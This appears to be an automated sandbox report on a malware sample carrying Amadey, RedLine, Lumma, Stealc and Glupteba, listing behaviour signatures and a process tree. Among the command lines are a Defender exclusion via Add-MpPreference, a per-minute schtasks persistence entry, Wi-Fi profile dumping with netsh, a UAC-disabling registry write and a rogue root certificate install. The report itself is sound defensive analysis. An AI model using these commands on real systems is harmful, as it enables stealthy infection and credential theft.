Analysis Overview
SHA256
217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854
Threat Level: Known bad
The file 217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854 was found to be: Known bad.
Malicious Activity Summary
Windows security bypass
ZGRat
Stealc
RedLine payload
Glupteba
Detect ZGRat V1
Lumma Stealer
RedLine
Glupteba payload
Amadey
UAC bypass
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Stops running service(s)
Downloads MZ/PE file
Identifies Wine through registry keys
Checks BIOS information in registry
Reads user/profile data of web browsers
Windows security modification
Reads local data of messenger clients
Themida packer
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Reads WinSCP keys stored on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Checks whether UAC is enabled
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System policy modification
Modifies system certificate store
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-04-25 17:25
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-25 17:25
Reported
2024-04-25 17:27
Platform
win10v2004-20240412-en
Max time kernel
56s
Max time network
152s
Command Line
Signatures
Amadey
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe | N/A |
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Downloads MZ/PE file
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4660 set thread context of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 2212 set thread context of 4640 | N/A | C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4244 set thread context of 2448 | N/A | C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 428 set thread context of 2696 | N/A | C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4780 set thread context of 3552 | N/A | C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\chrosha.job | C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe
"C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe"
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4660 -ip 4660
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 868
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 2212 -ip 2212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 332
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4244 -ip 4244
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 356
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"
C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe
"C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe"
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"
C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe
"C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\Admin\AppData\Local\Temp\Extension"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb20f0ab58,0x7ffb20f0ab68,0x7ffb20f0ab78
C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe
"C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\Admin\AppData\Local\Temp\Extension"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe" -Force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb1ebc46f8,0x7ffb1ebc4708,0x7ffb1ebc4718
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Users\Admin\Pictures\lUuhMnQQ7PvdGMiY8iAqBpGd.exe
"C:\Users\Admin\Pictures\lUuhMnQQ7PvdGMiY8iAqBpGd.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=280 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2216 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:8
C:\Users\Admin\Pictures\SUjb9Up84Rw8tmFImFpNS5X8.exe
"C:\Users\Admin\Pictures\SUjb9Up84Rw8tmFImFpNS5X8.exe"
C:\Users\Admin\Pictures\Tq7u51xB7kGO6x2EiTsCQngJ.exe
"C:\Users\Admin\Pictures\Tq7u51xB7kGO6x2EiTsCQngJ.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3064 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3100 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installg.bat" "
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4244 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4296 --field-trial-handle=1936,i,6953059893737183317,2075396238510464427,131072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,13290185478610148420,15821952867166750021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Users\Admin\Pictures\JxSE1viobyTMzUdd6pr1jYEY.exe
"C:\Users\Admin\Pictures\JxSE1viobyTMzUdd6pr1jYEY.exe"
C:\Users\Admin\Pictures\WUjqLI0y9xE0qFjc74GfaVjZ.exe
"C:\Users\Admin\Pictures\WUjqLI0y9xE0qFjc74GfaVjZ.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
